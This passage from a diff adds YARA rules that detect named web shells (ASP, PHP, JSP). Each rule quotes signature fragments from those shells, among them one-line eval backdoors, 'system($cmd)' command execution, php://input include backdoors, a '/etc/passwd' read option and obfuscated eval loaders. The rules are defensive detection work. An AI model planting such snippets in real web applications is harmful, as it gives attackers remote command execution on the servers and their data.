+		hash = "9827ba2e8329075358b8e8a53e20d545"
+	strings:
+		$s0 = "ResultSet r = c.getMetaData().getTables(null, null, \"%\", t);" fullword
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_asp_01 {
+	meta:
+		description = "Web Shell - file 01.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 50
+		hash = "61a687b0bea0ef97224c7bd2df118b87"
+	strings:
+		$s0 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_asp_404 {
+	meta:
+		description = "Web Shell - file 404.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d9fa1e8513dbf59fa5d130f389032a2d"
+	strings:
+		$s0 = "lFyw6pd^DKV^4CDRWmmnO1GVKDl:y& f+2"
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay02_1 {
+	meta:
+		description = "Web Shell - file webshell-cnseay02-1.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95fc76081a42c4f26912826cb1bd24b1"
+	strings:
+		$s0 = "(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU"
+	condition:
+		all of them
+}
+rule webshell_php_fbi {
+	meta:
+		description = "Web Shell - file fbi.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1fb32f8e58c8deb168c06297a04a21f1"
+	strings:
+		$s7 = "erde types','Getallen','Datum en tijd','Tekst','Binaire gegevens','Netwerk','Geo"
+	condition:
+		all of them
+}
+rule webshell_B374kPHP_B374k {
+	meta:
+		description = "Web Shell - file B374k.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bed7388976f8f1d90422e8795dff1ea6"
+	strings:
+		$s0 = "Http://code.google.com/p/b374k-shell" fullword
+		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+		$s4 = "B374k Vip In Beautify Just For Self" fullword
+	condition:
+		1 of them
+}
+rule webshell_cmd_asp_5_1 {
+	meta:
+		description = "Web Shell - file cmd-asp-5.1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+	strings:
+		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
+	condition:
+		all of them
+}
+rule webshell_php_dodo_zip {
+	meta:
+		description = "Web Shell - file zip.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b7800364374077ce8864796240162ad5"
+	strings:
+		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
+	condition:
+		all of them
+}
+rule webshell_aZRaiLPhp_v1_0 {
+	meta:
+		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "26b2d3943395682e36da06ed493a3715"
+	strings:
+		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
+	condition:
+		all of them
+}
+rule webshell_php_list {
+	meta:
+		description = "Web Shell - file list.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "922b128ddd90e1dc2f73088956c548ed"
+	strings:
+		$s1 = "// list.php = Directory & File Listing" fullword
+		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+		$s9 = "// by: The Dark Raver" fullword
+	condition:
+		1 of them
+}
+rule webshell_ironshell {
+	meta:
+		description = "Web Shell - file ironshell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+	strings:
+		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
+	condition:
+		all of them
+}
+rule webshell_caidao_shell_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+	strings:
+		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
+	condition:
+		all of them
+}
+rule webshell_ASP_aspydrv {
+	meta:
+		description = "Web Shell - file aspydrv.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "de0a58f7d1e200d0b2c801a94ebce330"
+	strings:
+		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
+	condition:
+		all of them
+}
+rule webshell_jsp_web {
+	meta:
+		description = "Web Shell - file web.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+	strings:
+		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
+	condition:
+		all of them
+}
+rule webshell_mysqlwebsh {
+	meta:
+		description = "Web Shell - file mysqlwebsh.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "babfa76d11943a22484b3837f105fada"
+	strings:
+		$s3 = " <TR><TD bgcolor=\"<? echo (!$CONNECT && $action == \"chparam\")?\"#660000\":\"#"
+	condition:
+		all of them
+}
+rule webshell_jspShell {
+	meta:
+		description = "Web Shell - file jspShell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0d5b5a17552254be6c1c8f1eb3a5fdc1"
+	strings:
+		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
+	condition:
+		all of them
+}
+rule webshell_Dx_Dx {
+	meta:
+		description = "Web Shell - file Dx.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+	strings:
+		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
+	condition:
+		1 of them
+}
+rule webshell_asp_ntdaddy {
+	meta:
+		description = "Web Shell - file ntdaddy.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+	strings:
+		$s9 =  "if  FP  =  \"RefreshFolder\"  or  "
+		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
+	condition:
+		1 of them
+}
+rule webshell_MySQL_Web_Interface_Version_0_8 {
+	meta:
+		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+	strings:
+		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
+	condition:
+		all of them
+}
+rule webshell_elmaliseker_2 {
+	meta:
+		description = "Web Shell - file elmaliseker.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+	strings:
+		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
+	condition:
+		all of them
+}
+rule webshell_ASP_RemExp {
+	meta:
+		description = "Web Shell - file RemExp.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+	strings:
+		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
+	condition:
+		all of them
+}
+rule webshell_jsp_list1 {
+	meta:
+		description = "Web Shell - file list1.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+	strings:
+		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
+	condition:
+		all of them
+}
+rule webshell_phpkit_1_0_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+	strings:
+		$s0 = "include('php://input');" fullword
+		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_123 {
+	meta:
+		description = "Web Shell - file 123.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c691f53e849676cac68a38d692467641"
+	strings:
+		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
+	condition:
+		all of them
+}
+rule webshell_asp_1 {
+	meta:
+		description = "Web Shell - file 1.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8991148adf5de3b8322ec5d78cb01bdb"
+	strings:
+		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
+		$s8 = "<%eval request(\"pass\")%>" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_tool {
+	meta:
+		description = "Web Shell - file tool.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "4ab68d38527d5834e9c1ff64407b34fb"
+	strings:
+		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
+		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
+	condition:
+		2 of them
+}
+rule webshell_cmd_win32 {
+	meta:
+		description = "Web Shell - file cmd_win32.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+	strings:
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+	condition:
+		2 of them
+}
+rule webshell_jsp_jshell {
+	meta:
+		description = "Web Shell - file jshell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "124b22f38aaaf064cef14711b2602c06"
+	strings:
+		$s0 = "kXpeW[\"" fullword
+		$s4 = "[7b:g0W@W<" fullword
+		$s5 = "b:gHr,g<" fullword
+		$s8 = "RhV0W@W<" fullword
+		$s9 = "S_MR(u7b" fullword
+	condition:
+		all of them
+}
+rule webshell_ASP_zehir4 {
+	meta:
+		description = "Web Shell - file zehir4.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7f4e12e159360743ec016273c3b9108c"
+	strings:
+		$s9 = "Response.Write \"<a href='\"&dosyaPath&\"?status=7&Path=\"&Path&\"/"
+	condition:
+		all of them
+}
+rule webshell_wsb_idc {
+	meta:
+		description = "Web Shell - file idc.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "7c5b1b30196c51f1accbffb80296395f"
+	strings:
+		$s1 = "if (md5($_GET['usr'])==$user && md5($_GET['pass'])==$pass)" fullword
+		$s3 = "{eval($_GET['idc']);}" fullword
+	condition:
+		1 of them
+}
+rule webshell_cpg_143_incl_xpl {
+	meta:
+		description = "Web Shell - file cpg_143_incl_xpl.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5937b131b67d8e0afdbd589251a5e176"
+	strings:
+		$s3 = "$data=\"username=\".urlencode($USER).\"&password=\".urlencode($PA"
+		$s5 = "fputs($sun_tzu,\"<?php echo \\\"Hi Master!\\\";ini_set(\\\"max_execution_time"
+	condition:
+		1 of them
+}
+rule webshell_mumaasp_com {
+	meta:
+		description = "Web Shell - file mumaasp.com.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "cce32b2e18f5357c85b6d20f564ebd5d"
+	strings:
+		$s0 = "&9K_)P82ai,A}I92]R\"q!C:RZ}S6]=PaTTR"
+	condition:
+		all of them
+}
+rule webshell_php_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "ced050df5ca42064056a7ad610a191b3"
+	strings:
+		$s0 = "$pass = md5(md5(md5($pass)));" fullword
+	condition:
+		all of them
+}
+rule webshell_webshell_cnseay_x {
+	meta:
+		description = "Web Shell - file webshell-cnseay-x.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a0f9f7f5cd405a514a7f3be329f380e5"
+	strings:
+		$s9 = "$_F_F.='_'.$_P_P[5].$_P_P[20].$_P_P[13].$_P_P[2].$_P_P[19].$_P_P[8].$_P_"
+	condition:
+		all of them
+}
+rule webshell_asp_up {
+	meta:
+		description = "Web Shell - file up.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f775e721cfe85019fe41c34f47c0d67c"
+	strings:
+		$s0 = "Pos = InstrB(BoundaryPos,RequestBin,getByteString(\"Content-Dispositio"
+		$s1 = "ContentType = getString(MidB(RequestBin,PosBeg,PosEnd-PosBeg))" fullword
+	condition:
+		1 of them
+}
+rule webshell_phpkit_0_1a_odd {
+	meta:
+		description = "Web Shell - file odd.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "3c30399e7480c09276f412271f60ed01"
+	strings:
+		$s1 = "include('php://input');" fullword
+		$s3 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
+		$s4 = "// uses include('php://input') to execute arbritary code" fullword
+		$s5 = "// php://input based backdoor" fullword
+	condition:
+		2 of them
+}
+rule webshell_ASP_cmd {
+	meta:
+		description = "Web Shell - file cmd.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97af88b478422067f23b001dd06d56a9"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>" fullword
+	condition:
+		all of them
+}
+rule webshell_PHP_Shell_x3 {
+	meta:
+		description = "Web Shell - file PHP Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a2f8fa4cce578fc9c06f8e674b9e63fd"
+	strings:
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s6 = "echo \"</form><form action=\\\"$SFileName?$urlAdd\\\" method=\\\"post\\\"><input"
+		$s9 = "if  ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset("
+	condition:
+		2 of them
+}
+rule webshell_PHP_g00nv13 {
+	meta:
+		description = "Web Shell - file g00nv13.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "35ad2533192fe8a1a76c3276140db820"
+	strings:
+		$s1 = "case \"zip\": case \"tar\": case \"rar\": case \"gz\": case \"cab\": cas"
+		$s4 = "if(!($sqlcon = @mysql_connect($_SESSION['sql_host'] . ':' . $_SESSION['sql_p"
+	condition:
+		all of them
+}
+rule webshell_php_h6ss {
+	meta:
+		description = "Web Shell - file h6ss.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "272dde9a4a7265d6c139287560328cd5"
+	strings:
+		$s0 = "<?php eval(gzuncompress(base64_decode(\""
+	condition:
+		all of them
+}
+rule webshell_jsp_zx {
+	meta:
+		description = "Web Shell - file zx.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "67627c264db1e54a4720bd6a64721674"
+	strings:
+		$s0 = "if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.g"
+	condition:
+		all of them
+}
+rule webshell_Ani_Shell {
+	meta:
+		description = "Web Shell - file Ani-Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "889bfc9fbb8ee7832044fc575324d01a"
+	strings:
+		$s0 = "$Python_CODE = \"I"
+		$s6 = "$passwordPrompt = \"\\n================================================="
+		$s7 = "fputs ($sockfd ,\"\\n==============================================="
+	condition:
+		1 of them
+}
+rule webshell_jsp_k8cmd {
+	meta:
+		description = "Web Shell - file k8cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b39544415e692a567455ff033a97a682"
+	strings:
+		$s2 = "if(request.getSession().getAttribute(\"hehe\").toString().equals(\"hehe\"))" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_cmd {
+	meta:
+		description = "Web Shell - file cmd.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5391c4a8af1ede757ba9d28865e75853"
+	strings:
+		$s6 = "out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<BR>\");" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_k81 {
+	meta:
+		description = "Web Shell - file k81.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "41efc5c71b6885add9c1d516371bd6af"
+	strings:
+		$s1 = "byte[] binary = BASE64Decoder.class.newInstance().decodeBuffer(cmd);" fullword
+		$s9 = "if(cmd.equals(\"Szh0ZWFt\")){out.print(\"[S]\"+dir+\"[E]\");}" fullword
+	condition:
+		1 of them
+}
+rule webshell_ASP_zehir {
+	meta:
+		description = "Web Shell - file zehir.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0061d800aee63ccaf41d2d62ec15985d"
+	strings:
+		$s9 = "Response.Write \"<font face=wingdings size=3><a href='\"&dosyaPath&\"?status=18&"
+	condition:
+		all of them
+}
+rule webshell_Worse_Linux_Shell {
+	meta:
+		description = "Web Shell - file Worse Linux Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "8338c8d9eab10bd38a7116eb534b5fa2"
+	strings:
+		$s0 = "system(\"mv \".$_FILES['_upl']['tmp_name'].\" \".$currentWD"
+	condition:
+		all of them
+}
+rule webshell_zacosmall {
+	meta:
+		description = "Web Shell - file zacosmall.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5295ee8dc2f5fd416be442548d68f7a6"
+	strings:
+		$s0 = "if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd).\"</strong><hr>"
+	condition:
+		all of them
+}
+rule webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit {
+	meta:
+		description = "Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
+	strings:
+		$s1 = "<option value=\"cat /etc/passwd\">/etc/passwd</option>" fullword
+	condition:
+		all of them
+}
+rule webshell_redirect {
+	meta:
+		description = "Web Shell - file redirect.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "97da83c6e3efbba98df270cc70beb8f8"
+	strings:
+		$s7 = "var flag = \"?txt=\" + (document.getElementById(\"dl\").checked ? \"2\":\"1\" "
+	condition:
+		all of them
+}
+rule webshell_jsp_cmdjsp {
+	meta:
+		description = "Web Shell - file cmdjsp.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b815611cc39f17f05a73444d699341d4"
+	strings:
+		$s5 = "<FORM METHOD=GET ACTION='cmdjsp.jsp'>" fullword
+	condition:
+		all of them
+}
+rule webshell_Java_Shell {
+	meta:
+		description = "Web Shell - file Java Shell.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "36403bc776eb12e8b7cc0eb47c8aac83"
+	strings:
+		$s4 = "public JythonShell(int columns, int rows, int scrollback) {" fullword
+		$s9 = "this(null, Py.getSystemState(), columns, rows, scrollback);" fullword
+	condition:
+		1 of them
+}
+rule webshell_asp_1d {
+	meta:
+		description = "Web Shell - file 1d.asp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "fad7504ca8a55d4453e552621f81563c"
+	strings:
+		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+	condition:
+		all of them
+}
+rule webshell_jsp_IXRbE {
+	meta:
+		description = "Web Shell - file IXRbE.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
+	strings:
+		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+	condition:
+		all of them
+}
+rule webshell_PHP_G5 {
+	meta:
+		description = "Web Shell - file G5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "95b4a56140a650c74ed2ec36f08d757f"
+	strings:
+		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+	condition:
+		all of them
+}
+rule webshell_PHP_r57142 {
+	meta:
+		description = "Web Shell - file r57142.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
+	strings:
+		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_tree {
+	meta:
+		description = "Web Shell - file tree.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
+	strings:
+		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
+		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+	condition:
+		all of them
+}
+rule webshell_C99madShell_v_3_0_smowu {
+	meta:
+		description = "Web Shell - file smowu.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "74e1e7c7a6798f1663efb42882b85bee"
+	strings:
+		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
+		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+	condition:
+		1 of them
+}
+rule webshell_simple_backdoor {
+	meta:
+		description = "Web Shell - file simple-backdoor.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "f091d1b9274c881f8e41b2f96e6b9936"
+	strings:
+		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
+		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
+		$s4 = "system($cmd);" fullword
+	condition:
+		2 of them
+}
+rule webshell_PHP_404 {
+	meta:
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "078c55ac475ab9e028f94f879f548bca"
+	strings:
+		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+	condition:
+		all of them
+}
+rule webshell_Macker_s_Private_PHPShell {
+	meta:
+		description = "Web Shell - file Macker's Private PHPShell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "e24cbf0e294da9ac2117dc660d890bb9"
+	strings:
+		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
+		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
+		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+	condition:
+		all of them
+}
+rule webshell_Antichat_Shell_v1_3_2 {
+	meta:
+		description = "Web Shell - file Antichat Shell v1.3.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "40d0abceba125868be7f3f990f031521"
+	strings:
+		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+	condition:
+		all of them
+}
+rule webshell_Safe_mode_breaker {
+	meta:
+		description = "Web Shell - file Safe mode breaker.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "5bd07ccb1111950a5b47327946bfa194"
+	strings:
+		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
+		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+	condition:
+		1 of them
+}
+rule webshell_Sst_Sheller {
+	meta:
+		description = "Web Shell - file Sst-Sheller.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d93c62a0a042252f7531d8632511ca56"
+	strings:
+		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
+		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+	condition:
+		all of them
+}
+rule webshell_jsp_list {
+	meta:
+		description = "Web Shell - file list.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "1ea290ff4259dcaeb680cec992738eda"
+	strings:
+		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
+		$s2 = "out.print(\") <A Style='Color: \" + fcolor.toString() + \";' HRef='?file=\" + fn"
+		$s7 = "if(flist[i].canRead() == true) out.print(\"r\" ); else out.print(\"-\");" fullword
+	condition:
+		all of them
+}
+rule webshell_PHPJackal_v1_5 {
+	meta:
+		description = "Web Shell - file PHPJackal v1.5.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d76dc20a4017191216a0315b7286056f"
+	strings:
+		$s7 = "echo \"<center>${t}MySQL cilent:</td><td bgcolor=\\\"#333333\\\"></td></tr><form"
+		$s8 = "echo \"<center>${t}Wordlist generator:</td><td bgcolor=\\\"#333333\\\"></td></tr"
+	condition:
+		all of them
+}
+rule webshell_customize {
+	meta:
+		description = "Web Shell - file customize.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "d55578eccad090f30f5d735b8ec530b1"
+	strings:
+		$s4 = "String cs = request.getParameter(\"z0\")==null?\"gbk\": request.getParameter(\"z"
+	condition:
+		all of them
+}
+rule webshell_s72_Shell_v1_1_Coding {
+	meta:
+		description = "Web Shell - file s72 Shell v1.1 Coding.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "c2e8346a5515c81797af36e7e4a3828e"
+	strings:
+		$s5 = "<font face=\"Verdana\" style=\"font-size: 8pt\" color=\"#800080\">Buradan Dosya "
+	condition:
+		all of them
+}
+rule webshell_jsp_sys3 {
+	meta:
+		description = "Web Shell - file sys3.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "b3028a854d07674f4d8a9cf2fb6137ec"
+	strings:
+		$s1 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">" fullword
+		$s4 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<%@page contentType=\"text/html;charset=gb2312\"%>" fullword
+	condition:
+		all of them
+}
+rule webshell_jsp_guige02 {
+	meta:
+		description = "Web Shell - file guige02.jsp"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "a3b8b2280c56eaab777d633535baf21d"
+	strings:
+		$s0 = "????????????????%><html><head><title>hahahaha</title></head><body bgcolor=\"#fff"
+		$s1 = "<%@page contentType=\"text/html; charset=GBK\" import=\"java.io.*;\"%><%!private"
+	condition:
+		all of them
+}
+rule webshell_php_ghost {
+	meta:
+		description = "Web Shell - file ghost.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "38dc8383da0859dca82cf0c943dbf16d"
+	strings:
+		$s1 = "<?php $OOO000000=urldecode('%61%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64'"
+		$s6 = "//<img width=1 height=1 src=\"http://websafe.facaiok.com/just7z/sx.asp?u=***.***"
+		$s7 = "preg_replace('\\'a\\'eis','e'.'v'.'a'.'l'.'(KmU(\"" fullword
+	condition:
+		all of them
+}
+rule webshell_WinX_Shell {
+	meta:
+		description = "Web Shell - file WinX Shell.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
+		score = 70
+		hash = "17ab5086aef89d4951fe9b7c7a561dda"
+	strings:
+		$s5 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">Filenam"
+		$s8 = "print \"<font face=\\\"Verdana\\\" size=\\\"1\\\" color=\\\"#990000\\\">File: </"
+	condition:
+		all of them
+}
+rule webshell_Crystal_Crystal {
+	meta:
+		description = "Web Shell - file Crystal.php"
+		author = "Florian Roth"
+		date = "2014/01/28"
